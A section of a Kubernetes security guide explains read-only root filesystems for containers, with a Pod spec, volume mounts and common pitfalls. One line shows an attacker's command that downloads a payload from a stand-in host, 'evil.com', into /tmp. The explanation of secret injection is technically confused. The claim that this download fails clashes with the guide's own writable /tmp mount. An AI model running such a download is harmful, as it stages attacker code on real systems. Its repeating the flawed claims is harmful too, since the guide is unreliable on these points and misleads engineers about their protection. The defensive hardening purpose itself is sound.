43.3 Read-Only Root Filesystems for Containers

Right, let’s talk about making your containers less of a liability. You’ve probably heard the phrase “defense in depth” until you’re sick of it. I get it. But this is one of those beautifully simple, “why wouldn’t you?” layers. The concept is stupidly simple: if a process inside your container has no business writing to the filesystem, don’t let it. At all. This isn’t just about protecting your precious application code; it’s about neutering a huge vector of attack. If an attacker breaks in, they can’t download tools, they can’t write scripts, they can’t persist. It turns a potential nightmare into a fleeting nuisance.

Now, before you get too excited, let’s be honest: this will break your application if you just slap it on without a thought. Most apps do need to write somewhere. The trick isn’t to make the entire container read-only; that’s a rookie mistake. The trick is to make the root filesystem (/) read-only and then explicitly allow writes only to the specific directories that absolutely need it, using volumes. This is the core of the practice.

The Basic Implementation

Here’s how you do it in a Pod spec. You’ll set readOnlyRootFilesystem: true in the container’s security context. Notice I said container, not Pod. This is a per-container setting, which is great because you can lock down your main app container while leaving any sidecars that need to write (like a logging agent) to their own devices.

apiVersion: v1
kind: Pod
metadata:
  name: my-locked-down-app
spec:
  containers:
  - name: app
    image: my-app:latest
    securityContext:
      readOnlyRootFilesystem: true
    volumeMounts:
    - name: temp-storage
      mountPath: /tmp
    - name: app-cache
      mountPath: /app/cache
  volumes:
  - name: temp-storage
    emptyDir: {}
  - name: app-cache
    emptyDir: {}

See what we did there? The root (/) is now read-only. But we’ve given the container two volumes it can write to: /tmp and /app/cache. This is the pattern. You’re not saying “no writing”; you’re saying “you may only write here, and I’m watching you.”

The Devil’s in the Details (aka Common Pitfalls)

This is where everyone gets tripped up. You enable this, your Pod crashes with a permission error, and you’re tempted to just disable it. Don’t. Diagnose.

Temporary Files (/tmp): This is the biggest offender. So many underlying libraries and utilities (hello, Glibc) just casually drop a file in /tmp on startup. Your app might not even know it’s happening. The fix is easy: mount an emptyDir volume at /tmp, as shown above. It’s a band-aid, but a necessary one.
Secret Injection: This one is brilliantly subtle. When Kubernetes injects a secret via a volume mount, it does so by creating a ..data symlink in the directory. For that symlink to be created and rotated, the directory needs to be writable. If you mount your secret to a path like /app/config.yaml, and your root is read-only, the injection mechanism can’t work. The solution? Mount secrets to a sub-path. This doesn’t require the parent directory to be writable.
```
volumeMounts:
- name: secret-volume
  mountPath: /app/secrets
  readOnly: true
# ... vs the problematic way ...
volumeMounts:
- name: secret-volume
  mountPath: /app  # This will fail if root is read-only!
  readOnly: true
```
Application Logs: If your application writes its logs to a file inside the container (e.g., /app/logs/app.log), that’s now broken. The right answer is almost always to ditch files and log to stdout/stderr, letting the container runtime and your log shipper (e.g., Fluentd) handle it. If you must use a log file, you must mount a volume for its location.

Why This Actually Works

The beauty of this isn’t just that it prevents writes. It’s that it fundamentally changes the attack surface. Imagine an attacker finds an RCE vulnerability in your app. Their first move is almost always to curl -o /tmp/malicious https://evil.com/malicious and then execute it. With a read-only root filesystem, that curl -o command fails instantly. They can’t plant their payload. They’re stuck, unable to escalate their foothold. It’s a fantastic containment strategy.

When to Avoid It (Be Pragmatic)

Don’t be a zealot. Some containers are basically designed to be interactive shells or need to write all over the place (looking at you, some legacy apps). Debugging containers with kubectl debug or using operational tools like apt-get obviously requires a writable filesystem. For these, you leave this setting off. The goal is to apply it to the vast majority of your stateless, functional application containers where the only writes should be to explicitly defined, closely watched volumes. It’s about reducing your attackable surface area, one container at a time.